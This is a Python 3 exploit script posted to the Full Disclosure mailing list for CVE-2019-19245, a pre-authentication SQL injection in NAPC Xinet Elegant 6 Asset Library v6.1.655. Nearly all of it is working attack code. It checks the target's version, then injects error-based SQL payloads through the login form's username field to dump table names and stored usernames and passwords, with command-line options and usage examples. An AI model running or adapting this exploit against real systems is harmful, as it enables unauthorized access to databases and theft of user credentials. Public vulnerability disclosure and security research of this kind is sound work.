Updated SQL Injection CVE-2019-19245 exploit for Python3. import requests,time,re,sys,argparse
#NAPC Xinet Elegant 6 Asset Library v6.1.655 #Pre-Auth SQL Injection 0day Exploit #By hyp3rlinx #ApparitionSec #UPDATED: Jan 2024 for python3 #TODO: add SSL support #=============================== #This will dump tables, usernames and passwords in vulnerable versions #REQUIRE PARAMS: LoginForm[password]=&LoginForm[rememberMe]=0&LoginForm[username]=SQL&yt0 #SQL INJECTION VULN PARAM --> LoginForm[username] #================================================ IP="" PORT="80" URL="" NUM_INJECTS=20 k=1 j=0 TABLES=False CREDS=False SHOW_SQL_ERROR=False def vuln_ver_chk(): global IP, PORT TARGET = "http://"+IP+":"+PORT+"/elegant6/login" response = requests.get(TARGET) if re.findall(r'\bElegant",appVersion:"6.1.655\b', response.content.decode()): print("[+] Found vulnerable NAPC Elegant 6 Asset Library version 6.1.655.") return True print("[!] Version not vulnerable :(") return False def sql_inject_request(SQL): global IP, PORT URL = "http://"+IP+":"+PORT+"/elegant6/login" tmp="" headers = {'User-Agent': 'Mozilla/5.0'} payload = {'LoginForm[password]':'1','LoginForm[rememberMe]':'0','LoginForm[username]':SQL} session = requests.Session() res = session.post(URL,headers=headers,data=payload) idx = res.content.decode('utf-8').find('CDbCommand') # Start of SQL Injection Error in response idx2 = res.content.decode('utf-8').find('key 1') # End of SQL Injection Error in response return res.content[idx : idx2+3] #Increments SQL LIMIT clause 0,1, 1,2, 1,3 etc def inc(): global k,j while j < NUM_INJECTS: j+=1 if k !=1: k+=1 return str(j)+','+str(k) def tidy_up(results): global CREDS idx = results.find("'".encode()) if idx != -1: idx2 = results.rfind("'".encode()) if not CREDS: return results[idx + 1: idx2 -2] else: return results[idx + 2: idx2] def breach(i): global k,j,NUM_INJECTS,SHOW_SQL_ERROR result="" #Dump Usernames & Passwords if CREDS: if i % 2 == 0: target='username' else: target='password' SQL=('"and (select 1 from(select count(*),concat((select(select concat(0x2b,'+target+'))' 'from user limit '+str(i)+', 1),floor(rand(0)*2))x from user group by x)a)-- -') if not SHOW_SQL_ERROR: result = tidy_up(sql_inject_request(SQL)) if result: result = result.decode() else: result = sql_inject_request(SQL)+"\n" if result: result = result.decode() print("[+] Dumping "+str(target)+": "+str(result)) #Dump Tables if TABLES: while j < NUM_INJECTS: nums = inc() SQL=('"and (select 1 from (Select count(*),Concat((select table_name from information_schema.tables where table_schema=database()' 'limit '+nums+'),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)-- -') if not SHOW_SQL_ERROR: result = tidy_up(sql_inject_request(SQL)) else: result = sql_inject_request(SQL) + "\n" if result: print("[+] Dumping Table... " +str(result.decode())) time.sleep(0.3) def parse_args(): parser = argparse.ArgumentParser() parser.add_argument("-i", "--ip_address", help="<TARGET-IP>.") parser.add_argument("-p", "--port", help="Port, Default is 80") parser.add_argument("-t", "--get_tables", nargs="?", const="1", help="Dump Database Tables.") parser.add_argument("-c", "--creds", nargs="?", const="1", help="Dump Database Credentials.") parser.add_argument("-m", "--max_injects", nargs="?", const="1", help="Max SQL Injection Attempts, Default is 20.") parser.add_argument("-s", "--show_sql_errors", nargs="?", const="1", help="Display SQL Errors, Default is Clean Dumps.") parser.add_argument("-e", "--examples", nargs="?", const="1", help="Show script usage.") return parser.parse_args() def usage(): print("Dump first ten rows of usernames and passwords") print("NAPC-Elegant-6-SQL-Exploit.py -i <TARGET-IP> -c -m 10\n") print("\nDump first five rows of database tables and show SQL errors") print("NAPC-Elegant-6-SQL-Exploit.py -i <TARGET-IP> -t -m 5 -s\n") print("NAPC-Elegant-6-SQL-Exploit.py -i <TARGET-IP> -p80 -t -c -m30\n") exit(0) def main(args): global TABLES,CREDS,URL,IP,NUM_INJECTS,SHOW_SQL_ERROR if args.ip_address: IP=args.ip_address if args.port: PORT=args.port if args.get_tables: TABLES=True if args.creds: CREDS=True if args.max_injects: NUM_INJECTS = int(args.max_injects) if args.show_sql_errors: SHOW_SQL_ERROR=True if args.examples: usage() if vuln_ver_chk(): for i in range(0, NUM_INJECTS): breach(i) time.sleep(0.3) if __name__=='__main__': parser = argparse.ArgumentParser() print("NAPC Elegant 6 Asset Library v6.1.655") print("Pre-Authorization SQL Injection 0day Exploit") print("Discovery / eXploit By hyp3rlinx") print("ApparitionSec\n") time.sleep(0.5) if len(sys.argv)== 1: parser.print_help(sys.stderr) sys.exit(0) main(parse_args()) _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/